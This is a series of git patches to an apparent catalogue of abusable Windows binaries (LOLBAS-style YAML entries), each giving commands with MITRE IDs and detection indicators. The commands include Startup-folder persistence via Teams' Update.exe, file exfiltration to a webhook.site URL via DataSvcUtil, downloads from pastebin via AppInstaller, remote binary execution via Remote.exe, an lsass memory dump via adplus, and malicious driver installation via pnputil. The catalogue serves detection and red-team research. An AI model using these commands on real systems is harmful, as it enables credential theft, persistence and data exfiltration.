From 9642f81be7aa37b069cdefbeb8b17c341de71fd2 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Thu, 29 Oct 2020 09:12:28 +0100 Subject: [PATCH 01/32] Update Update.yml I update this LolBin to create persistence of payload.exe in the directory "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" by running payload.exe with the argument "--createShortcut" and "--removeShortcut". --- yml/OtherMSBinaries/Update.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 5195cf0..b22d000 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -92,6 +92,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --createShortcut=payload.exe -l=Startup + Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1547 + MitreLink: https://attack.mitre.org/techniques/T1547/001/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --removeShortcut=payload.exe -l=Startup + Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1070 + MitreLink: https://attack.mitre.org/techniques/T1070/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\update.exe' Code_Sample: 
@@ -114,4 +130,5 @@ Acknowledgement: Handle: '@MrUn1k0d3r' - Person: Adam Handle: '@Hexacorn' + - Person: Jesus Galvez --- From 31c7d34a00e31e7baa00fc889288de331a4da139 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Sun, 1 Nov 2020 19:50:59 +0100 Subject: [PATCH 02/32] Create Update.yml This file describes LoLbin Update.exe deployed in the Whatsapp installation for Windows Operating Systems. --- yml/LOLUtilz/OtherBinaries/Update.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 yml/LOLUtilz/OtherBinaries/Update.yml diff --git a/yml/LOLUtilz/OtherBinaries/Update.yml b/yml/LOLUtilz/OtherBinaries/Update.yml new file mode 100644 index 0000000..6cfa0a3 --- /dev/null +++ b/yml/LOLUtilz/OtherBinaries/Update.yml @@ -0,0 +1,18 @@ +--- +Name: Update.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. +Author: 'Jesus Galvez' +Created: '2020-11-01' + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Whatsapp installed +Full_Path: + - Path: '%localappdata%\Whatsapp\Update.exe' +Detection: + - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process +--- From 4c67be51c1701760aae797a55a92996ac1c1e71f Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Sun, 1 Nov 2020 20:05:25 +0100 Subject: [PATCH 03/32] Delete Update.yml --- yml/LOLUtilz/OtherBinaries/Update.yml | 18 ------------------ 1 file changed, 18 deletions(-) delete mode 100644 yml/LOLUtilz/OtherBinaries/Update.yml 
diff --git a/yml/LOLUtilz/OtherBinaries/Update.yml b/yml/LOLUtilz/OtherBinaries/Update.yml deleted file mode 100644 index 6cfa0a3..0000000 --- a/yml/LOLUtilz/OtherBinaries/Update.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- -Name: Update.exe -Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. -Author: 'Jesus Galvez' -Created: '2020-11-01' - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" - Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. - Usecase: Execute binary - Category: Execute - Privileges: User - MitreID: T1218 - MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows 7 and up with Whatsapp installed -Full_Path: - - Path: '%localappdata%\Whatsapp\Update.exe' -Detection: - - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process ---- From 483482e3a33ed4f8b91214e1f8525e14553d94e0 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Sun, 1 Nov 2020 20:09:41 +0100 Subject: [PATCH 04/32] Create Upload.yml File describing the execution of LolBin Update.exe deployed with the installation of Whatsapp on Windows operating systems. --- yml/LOLUtilz/OtherBinaries/Upload.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 yml/LOLUtilz/OtherBinaries/Upload.yml diff --git a/yml/LOLUtilz/OtherBinaries/Upload.yml b/yml/LOLUtilz/OtherBinaries/Upload.yml new file mode 100644 index 0000000..6cfa0a3 --- /dev/null +++ b/yml/LOLUtilz/OtherBinaries/Upload.yml 
@@ -0,0 +1,18 @@ +--- +Name: Update.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. +Author: 'Jesus Galvez' +Created: '2020-11-01' + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Whatsapp installed +Full_Path: + - Path: '%localappdata%\Whatsapp\Update.exe' +Detection: + - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process +--- From 15d5ff302df7a7b03c79c90ae3d5fd6055126f9b Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Sat, 7 Nov 2020 14:22:24 +0100 Subject: [PATCH 05/32] Create Dllhost.yml --- yml/OSBinaries/Dllhost.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/Dllhost.yml diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml new file mode 100644 index 0000000..30c9d76 --- /dev/null +++ b/yml/OSBinaries/Dllhost.yml 
@@ -0,0 +1,30 @@ +--- +Name: Dllhost.exe +Description: Used by Windows to DLL Surrogate COM Objects +Author: 'Nasreddine Bencherchali' +Created: '2020-11-07' +Commands: + - Command: dllhost.exe /Processid:{CLSID} + Description: Use dllhost.exe to load a registered or hijacked COM Server payload. + Usecase: Execute a DLL Surrogate COM Object. + Category: Execute + Privileges: User + MitreID: T1546.015 + MitreLink: https://attack.mitre.org/techniques/T1546/015/ + OperatingSystem: Windows 10 (and likely previous versions) +Full_Path: + - Path: C:\Windows\System32\dllhost.exe + - Path: C:\Windows\SysWOW64\dllhost.exe +Code_Sample: +- Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/CyberRaiju/status/1167415118847598594 + - Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 +Acknowledgement: + - Person: Jai Minton + Handle: '@CyberRaiju' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' +--- From bfe248b07e17ecaf903ffaef972a8ad845f5eb0c Mon Sep 17 00:00:00 2001 From: unload Date: Tue, 1 Dec 2020 22:57:09 -0300 Subject: [PATCH 06/32] Create DataSvcUtil.yml Another data exfil way with lolbins --- yml/OSBinaries/DataSvcUtil.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/DataSvcUtil.yml diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml new file mode 100644 index 0000000..e5dd633 --- /dev/null +++ b/yml/OSBinaries/DataSvcUtil.yml 
@@ -0,0 +1,30 @@ +--- +Name: DataSvcUtil.exe +Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. +Author: 'Ialle Teixeira' +Created: '01/12/2020' +Commands: + - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + MitreLink: https://attack.mitre.org/techniques/T1567/ + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe +Code_Sample: + - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 +Detection: + - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. + - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. +Resources: + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +Acknowledgement: + - Person: Ialle Teixeira + Handle: '@NtSetDefault' +--- From b381d04faf527381b75194314a400f9da2f86a87 Mon Sep 17 00:00:00 2001 
From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Wed, 2 Dec 2020 11:35:49 -0500 Subject: [PATCH 07/32] Create AppInstaller.yml New lolbin for downloading files in Windows 10. --- yml/OSBinaries/AppInstaller.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/AppInstaller.yml diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml new file mode 100644 index 0000000..2b7c39d --- /dev/null +++ b/yml/OSBinaries/AppInstaller.yml @@ -0,0 +1,22 @@ +--- +Name: AppInstaller.exe +Description: Tool used for installation of AppX/MSIX applications on Windows 10 +Author: 'Wade Hickey' +Created: '2020-12-02' +Commands: + - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1333900137232523264 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- From 36b28ddd9890a995d4e9e2e8b8bccc478372c8b0 Mon Sep 17 00:00:00 2001 From: michalani <27767884+michalani@users.noreply.github.com> Date: Thu, 3 Dec 2020 01:03:08 +0000 Subject: [PATCH 08/32] Update Winword.yml --- yml/OtherMSBinaries/Winword.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index b39a89f..e8373f4 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml 
@@ -13,6 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows Full_Path: + - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe @@ -38,4 +39,4 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- \ No newline at end of file +--- From deb249042b40be3dc1432c0482e195c781dd0740 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 8 Dec 2020 15:32:35 -0500 Subject: [PATCH 09/32] Update the affected operating systems for SyncAppvPublishingServer --- yml/OSBinaries/Syncappvpublishingserver.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 2822c69..8c5fa8b 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- \ No newline at end of file +--- From 21f414c47915e4ce177ecf371150145cf70670d3 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Fri, 25 Dec 2020 12:05:16 -0800 Subject: [PATCH 10/32] Create pnputil.exe --- pnputil.exe | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 pnputil.exe 
diff --git a/pnputil.exe b/pnputil.exe new file mode 100644 index 0000000..7611392 --- /dev/null +++ b/pnputil.exe @@ -0,0 +1,39 @@ +--- +Name: pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: + pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: Binary file used by .NET to compile c# code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Execution + Privileges required:Administrator + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + OperatingSystem: Windows 10,7 + - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll + Description: Binary file used by .NET to compile c# code to dll + Usecase: A description of the usecase + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + +Full_Path: + - Path: + C:\Windows\System32\PnPUtil.exe +Code_Sample: +https://github.com/LuxNoBulIshit/test.inf/blob/main/inf + +Code: +1.pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf +Acknowledgement: + - Person: +Hai Vaknin(Lux) https://github.com/LuxNoBulIshit +Avihay Eldad +AlonEliassaf http://github.com/aloneliassaf + + +--- From 0d819439c5e027fdcbb9de77857a513416c4b675 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Fri, 25 Dec 2020 12:14:15 -0800 Subject: [PATCH 11/32] Create pnputil.exe --- yml/OSBinaries/pnputil.exe | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 yml/OSBinaries/pnputil.exe diff --git a/yml/OSBinaries/pnputil.exe b/yml/OSBinaries/pnputil.exe new file mode 100644 index 0000000..3ce817e --- /dev/null +++ b/yml/OSBinaries/pnputil.exe 
@@ -0,0 +1,29 @@ +--- +Name: Pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: + pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: used for Install drivers + Usecase: add malicious driver. + Category: Execution + Privileges required:Administrator. + MitreID: + MitreLink: + OperatingSystem: Windows 10,7 + +Full_Path: + - Path: + C:\Windows\system32\pnputil.exe + +Code_Sample: +https://github.com/LuxNoBulIshit/test.inf/blob/main/inf +Acknowledgement: + - Person: +Hai Vaknin(Lux) https://github.com/LuxNoBulIshit +Avihay eldad +AlonEliassaf http://github.com/aloneliassaf + +--- From f59da6598c63afe641af6685c2decd427998babf Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Fri, 25 Dec 2020 12:22:28 -0800 Subject: [PATCH 12/32] Delete pnputil.exe --- pnputil.exe | 39 --------------------------------------- 1 file changed, 39 deletions(-) delete mode 100644 pnputil.exe diff --git a/pnputil.exe b/pnputil.exe deleted file mode 100644 index 7611392..0000000 --- a/pnputil.exe +++ /dev/null 
@@ -1,39 +0,0 @@ ---- -Name: pnputil.exe -Description: used for Install drivers. -Author: Hai vaknin (lux) -Created: 25/12/2020 -Commands: - - Command: - pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf - Description: Binary file used by .NET to compile c# code to .exe - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Execution - Privileges required:Administrator - MitreID: T1127 - MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 - - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll - Description: Binary file used by .NET to compile c# code to dll - Usecase: A description of the usecase - Category: Compile - Privileges required:User - MitreID: T1127 - MitreLink: https://attack.mitre.org/techniques/T1127/ - -Full_Path: - - Path: - C:\Windows\System32\PnPUtil.exe -Code_Sample: -https://github.com/LuxNoBulIshit/test.inf/blob/main/inf - -Code: -1.pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf -Acknowledgement: - - Person: -Hai Vaknin(Lux) https://github.com/LuxNoBulIshit -Avihay Eldad -AlonEliassaf http://github.com/aloneliassaf - - ---- From 7dab1b916e485bc5e3494dc0cf89f07508f153a9 Mon Sep 17 00:00:00 2001 From: ahmad Date: Wed, 6 Jan 2021 20:48:25 -0500 Subject: [PATCH 13/32] Create remote.yml --- yml/OtherMSBinaries/Remote.yml | 43 ++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 yml/OtherMSBinaries/Remote.yml diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..9f3b4d3 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml 
@@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Allows you to run command-line programs on remote computers +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Avoiding any writes to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- \ No newline at end of file From 4254927f78d46a84e495966138b4f1ff81c223b6 Mon Sep 17 00:00:00 2001 From: Ahmad AS Date: Wed, 6 Jan 2021 23:31:01 -0500 Subject: [PATCH 14/32] Update Remote.yml --- yml/OtherMSBinaries/Remote.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 9f3b4d3..8e7a935 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml 
@@ -1,6 +1,6 @@ --- Name: Remote.exe -Description: Allows you to run command-line programs on remote computers +Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 1/6/2021 Commands: @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -19,15 +19,15 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file - Usecase: Avoiding any writes to disk + Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe @@ -40,4 +40,4 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- \ No newline at end of file +--- From 080fe4ca5bf2a5dec5e70fb056ee2e9730dd17b1 Mon Sep 17 00:00:00 2001 From: ahmad Date: Sat, 9 Jan 2021 02:56:32 -0500 Subject: [PATCH 15/32] Create Adplus.yml --- yml/OtherMSBinaries/Adplus.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 yml/OtherMSBinaries/Adplus.yml diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml new file mode 100644 index 0000000..9e35b3c --- /dev/null +++ b/yml/OtherMSBinaries/Adplus.yml 
@@ -0,0 +1,27 @@ +--- +Name: adplus.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/9/2021 +Commands: + - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet + Description: Creates a memory dump of the lsass process + Usecase: Create memory dump and parse it offline + Category: Credentials + Privileges: SYSTEM + MitreID: T1003 + MitreLink: https://attack.mitre.org/techniques/T1003/ + OperatingSystem: All Windows +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- \ No newline at end of file From be69f54245d0f0027b614eb01557c269d6ef79f1 Mon Sep 17 00:00:00 2001 From: Ahmad AS Date: Sat, 9 Jan 2021 03:00:05 -0500 Subject: [PATCH 16/32] Update Adplus.yml --- yml/OtherMSBinaries/Adplus.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 9e35b3c..d3095d9 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -7,7 +7,7 @@ Commands: - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline - Category: Credentials + Category: Dump Privileges: SYSTEM MitreID: T1003 MitreLink: https://attack.mitre.org/techniques/T1003/ @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- \ No newline at end of file +--- From 00935f154eeced5b546311d6b54d72a822b54554 Mon Sep 17 00:00:00 2001 
From: wokis Date: Wed, 20 Jan 2021 14:47:23 +0100 Subject: [PATCH 17/32] Update Wsreset.yml Added detection by Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen --- yml/OSBinaries/Wsreset.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 9a1cbdd..e0a9d7a 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -19,6 +19,7 @@ Code Sample: Detection: - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command + - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen Resources: - Link: https://www.activecyber.us/activelabs/windows-uac-bypass - Link: https://twitter.com/ihack4falafel/status/1106644790114947073 From 64914b641ceb5b0c4519030ba2b3070b48722b24 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 21 Jan 2021 22:48:05 +0100 Subject: [PATCH 18/32] Adjusted error on pnputil yml file --- yml/OSBinaries/pnputil.exe | 29 ----------------------------- yml/OSBinaries/pnputil.yml | 23 +++++++++++++++++++++++ 2 files changed, 23 insertions(+), 29 deletions(-) delete mode 100644 yml/OSBinaries/pnputil.exe create mode 100644 yml/OSBinaries/pnputil.yml diff --git a/yml/OSBinaries/pnputil.exe b/yml/OSBinaries/pnputil.exe deleted file mode 100644 index 3ce817e..0000000 --- a/yml/OSBinaries/pnputil.exe +++ /dev/null 
@@ -1,29 +0,0 @@ ---- -Name: Pnputil.exe -Description: used for Install drivers. -Author: Hai vaknin (lux) -Created: 25/12/2020 -Commands: - - Command: - pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf - Description: used for Install drivers - Usecase: add malicious driver. - Category: Execution - Privileges required:Administrator. - MitreID: - MitreLink: - OperatingSystem: Windows 10,7 - -Full_Path: - - Path: - C:\Windows\system32\pnputil.exe - -Code_Sample: -https://github.com/LuxNoBulIshit/test.inf/blob/main/inf -Acknowledgement: - - Person: -Hai Vaknin(Lux) https://github.com/LuxNoBulIshit -Avihay eldad -AlonEliassaf http://github.com/aloneliassaf - ---- diff --git a/yml/OSBinaries/pnputil.yml b/yml/OSBinaries/pnputil.yml new file mode 100644 index 0000000..fd6dbd8 --- /dev/null +++ b/yml/OSBinaries/pnputil.yml @@ -0,0 +1,23 @@ +--- +Name: Pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: used for Install drivers + Usecase: add malicious driver. + Category: Execution + Privileges: Administrator + MitreID: T1215 + MitreLink: https://attack.mitre.org/techniques/T1215 + OperatingSystem: Windows 10,7 +Full_Path: + - Path: C:\Windows\system32\pnputil.exe +Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf +Acknowledgement: + - Person: Hai Vaknin(Lux) + Handle: 'LuxNoBulIshit' + - Person: Avihay eldad + Handle: 'aloneliassaf' +--- From 2406d99f33b0eb35eb938372dbf0e5e92eb67622 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 21 Jan 2021 22:49:19 +0100 Subject: [PATCH 19/32] Rename pnputil.yml to Pnputil.yml Casing --- yml/OSBinaries/{pnputil.yml => Pnputil.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{pnputil.yml => Pnputil.yml} (100%) 
diff --git a/yml/OSBinaries/pnputil.yml b/yml/OSBinaries/Pnputil.yml similarity index 100% rename from yml/OSBinaries/pnputil.yml rename to yml/OSBinaries/Pnputil.yml From b79a48f082cdde1de9ab542c0760d3aeac7ebb54 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 21 Jan 2021 22:54:58 +0100 Subject: [PATCH 20/32] Fixed Category on pnputil --- yml/OSBinaries/Pnputil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index fd6dbd8..55662df 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -7,7 +7,7 @@ Commands: - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf Description: used for Install drivers Usecase: add malicious driver. - Category: Execution + Category: Execute Privileges: Administrator MitreID: T1215 MitreLink: https://attack.mitre.org/techniques/T1215 From 3ca7bdc5422c3fe710ff54fc18401e9b5b61f190 Mon Sep 17 00:00:00 2001 From: ahmad Date: Fri, 22 Jan 2021 06:33:58 -0500 Subject: [PATCH 21/32] Fixed the url --- yml/OtherMSBinaries/Adplus.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index d3095d9..9857834 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -20,7 +20,7 @@ Code_Sample: Detection: - IOC: Resources: - - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ + - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' From 84de927a839510b52bbbd4b04c82be12ed222d03 Mon Sep 17 00:00:00 2001 